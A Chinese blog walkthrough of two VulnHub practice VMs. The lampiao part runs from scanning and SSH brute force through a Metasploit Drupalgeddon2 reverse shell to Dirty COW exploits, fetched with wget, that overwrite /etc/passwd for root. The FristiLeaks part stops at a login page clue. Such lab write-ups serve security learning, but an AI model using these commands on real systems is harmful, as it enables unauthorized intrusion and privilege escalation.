vulnhub 渗透测试练习 lampiao & FristiLeaks

Posted on | Post modified | In

lampiao

镜像在这里,是vulnhub提供的一个虚拟机,用VM打开之后便开始渗透测试。

主机发现

首先是主机发现,因为并不知道靶机的IP地址,于是使用nmap,进行扫描,这里我扫了vm虚拟网卡的C段nmap -sn 192.168.0.0/16,结果如下:

C段扫描

我们可以看到目标主机的ip地址应该是192.168.253.130这个。

端口扫描

之后对这个ip进行端口扫描(我将vm的网络模式改为了桥接模式,所以ip变为了192.168.1.100),首先扫了常见端口:

1
2
3
4
nmap -v -sV --top-ports 3674 192.168.1.100
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http?

得到开放的两个服务,ssh和80端口的web。具体的ssh信息可以用msf的auxiliary/scanner/ssh/ssh_version进行探查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf > search ssh
[!] Module database cache not built yet, using slow search
Matching Modules
================
   Name                                                        Disclosure Date  Rank       Description
   ----                                                        ---------------  ----       -----------
   auxiliary/scanner/ssh/ssh_version                                            normal     SSH Version Scanner
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe
msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.100
rhosts => 192.168.1.100
msf auxiliary(scanner/ssh/ssh_version) > exploit
[+] 192.168.1.100:22      - SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.7 ( service.version=6.6.1p1 openssh.comment=Ubuntu-2ubuntu2.7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=14.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

没有得到什么其他有效信息,尝试用hydra进行密码爆破,用自带的字典没找到,使用crunch生成的字典也没有结果,目测行不通:

1
2
3
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -V -t 10 ssh://192.168.1.100
-V 显示爆破过程 -t为进程数

转看80端口web页面,是个静态页面,nikto扫了没什么发现,dirb和御剑扫目录,都没什么发现,emmmm尴尬。难道,服务放在了很脏的端口上吗? 于是重新进行了端口扫描,使用:

1
2
3
4
5
6
7
8
root@kali:~# sudo nmap -v -sS -sV -Pn -p 1-65535 192.168.1.100
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:14:89:32 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现1898还开着一个web服务,有戏,访问看到:

homepage

浏览一下页面,主页面只有用户登录、注册、找回密码等信息,推测可能存在的突破点:

  • 页面sql注入
  • 账号密码破解
  • 目录扫描
  • Drupal框架漏洞

我们预想去测试威胁比较大的框架漏洞,毕竟web常见漏洞比较繁琐,web页面如果多一时半会不太容易找到点。先扫下目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# dirb http://192.168.1.100:1898 -o out
---- Scanning URL: http://192.168.1.100:1898/ ----
==> DIRECTORY: http://192.168.1.100:1898/includes/                                                                                        
+ http://192.168.1.100:1898/index.php (CODE:200|SIZE:11423)                                                                               
==> DIRECTORY: http://192.168.1.100:1898/misc/                                                                                            
==> DIRECTORY: http://192.168.1.100:1898/modules/                                                                                         
==> DIRECTORY: http://192.168.1.100:1898/profiles/                                                                                        
+ http://192.168.1.100:1898/robots.txt (CODE:200|SIZE:2189)                                                                               
==> DIRECTORY: http://192.168.1.100:1898/scripts/                                                                                         
+ http://192.168.1.100:1898/server-status (CODE:403|SIZE:295)                                                                             
==> DIRECTORY: http://192.168.1.100:1898/sites/                                                                                           
==> DIRECTORY: http://192.168.1.100:1898/themes/                                                                                          
+ http://192.168.1.100:1898/web.config (CODE:200|SIZE:2200)                                                                               
+ http://192.168.1.100:1898/xmlrpc.php (CODE:200|SIZE:42)

可以看见,扫到了一些目录和文件,摘出来可能有用的内容。/modules/路径可以看到其支持的组件,可能之后会派上用场,还有/robots文件,和xmlrpc.php可能会有用处。这里先大概扫一眼。

getshell

然后尝试对drupal框架进行攻击,我们查找drupal的漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf > search drupal
[!] Module database cache not built yet, using slow search
Matching Modules
================
   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Drupal Drupalgeddon 2 Forms API Property Injection
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

这里,我们其实可以从刚才的robots.txt中看到其更新日志,为drupal 7.54 2017-02-01 所以,我们这里选了最新的drupal_drupalgeddon2,好像是才报的,我们使用info查看下详细信息,看来是CVE-2018-7600.去网上搜下这个漏洞的详情。Drupal CVE-2018-7600 分析及 PoC 构造

粗略的看了下,是一个远程代码执行漏洞,主要原理是drupal对于#开头的变量有特殊处理,在注册时,可以通过传入恶意代码,造成执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.100
rhost => 192.168.1.100
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 192.168.1.103:4444
[*] Drupal 7 targeted at http://192.168.1.100:1898/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Sending stage (37775 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:54178) at 2018-09-04 09:19:16 +0800
meterpreter > shell
Process 3946 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$

提权

得到shell,之后我们直接使用查看uname -a内核版本,我们首先考虑linux通用内核漏洞dirty cow:

1
2
3
4
5
6
7
8
9
10
11
12
 ~  searchsploit -tw dirty cow
------------------------------------------------------------------------------------------ --------------------------------------------
 Exploit Title                                                                            |  URL
------------------------------------------------------------------------------------------ --------------------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                    | https://www.exploit-db.com/exploits/43199/
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                    | https://www.exploit-db.com/exploits/44305/
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege | https://www.exploit-db.com/exploits/40616/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalatio | https://www.exploit-db.com/exploits/40847/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Meth | https://www.exploit-db.com/exploits/40838/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escala | https://www.exploit-db.com/exploits/40839/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Metho | https://www.exploit-db.com/exploits/40611/
------------------------------------------------------------------------------------------ --------------------------------------------

于是之后我们使用CVE-2016-5195这个提权漏洞

/proc/self/mem

我们先利用的是这个

Linux Kernel 2.6.22 < 3.9 - ‘Dirty COW /proc/self/mem’ Race Condition Privilege Escalation (/etc/passwd Method)

这个显示的<3.9我一开始还以为无法使用,因为看到内核是4.4的,最后发现是可以的。漏洞具体的详情可以自己去看详情,这里不再赘述。我们首先下载exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@lampiao:/var/www/html$ wget https://www.exploit-db.com/download/40847.cpp
www-data@lampiao:/var/www/html$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
<tml$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
www-data@lampiao:/var/www/html$ ./dcow -s
./dcow -s
Running ...
Password overridden to: dirtyCowFun
Received su prompt (Password: )
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak

便可以拿到root权限

PTRACE_POKEDATA

同样我们可以利用:

Linux Kernel 2.6.22 < 3.9 - ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@lampiao:/var/www/html$ wget https://www.exploit-db.com/download/40839.c
www-data@lampiao:/var/www/html$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
www-data@lampiao:/var/www/html$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash
mmap: b7791000

此时可以通过切换至firefart用户get flag。

FristiLeaks

镜像在这里,是vulnhub提供的一个虚拟机,用VirtualBox导入,注意这里需要将MAC地址修改为08:00:27:A5:A6:76

主机发现

这里我们换一个工具netdiscover,这个比nmap更为友好和快捷。

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# netdiscover -r 192.168.0.0/16
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                 
 10 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 600                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     8c:a6:df:27:b5:3c      8     480  TP-LINK TECHNOLOGIES CO.,LTD.                                               
 192.168.1.100   08:00:27:a5:a6:76      1      60  PCS Systemtechnik GmbH                                                      
 192.168.1.103   00:24:9b:24:99:6b      1      60  Action Star Enterprise Co., Ltd.

发现目标IP为192.168.1.100然后顺手查了下后面是个什么公司,竟然存在,先放着。之后端口扫描。有之前的教训,这次直接扫所有的。

端口扫描

1
2
3
4
5
root@kali:~# sudo nmap -v -sS -sV -Pn -p 1-65535 192.168.1.100
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

emmm,只有80端口?别想骗我,换个姿势再试一下.emm还是没扫出来,那就先看这个好了。看下主页,一个静态页面啥都没用,扫目录。

1
2
3
4
5
---- Scanning URL: http://192.168.1.103/ ----
+ http://192.168.1.103/cgi-bin/ (CODE:403|SIZE:210)                                                                            
==> DIRECTORY: http://192.168.1.103/images/                                                                                    
+ http://192.168.1.103/index.html (CODE:200|SIZE:703)                                                                          
+ http://192.168.1.103/robots.txt (CODE:200|SIZE:62)

有用的应该就robots.txtcgi-bincgi-bin没权限,看下robots.txt好了,发现3个路径,colasiisibeer,访问了这3个发现都是图片.

报警了

冷静,冷静,图片有提示,fristi,虽然有点。。。但是也算进来了。一个登陆页面. 先看下源码,注释里面有一串内容,base64内容,解密后得到一个图片。

kkkkk

看起来是密码,与之前的eezeepz一起,尝试登陆。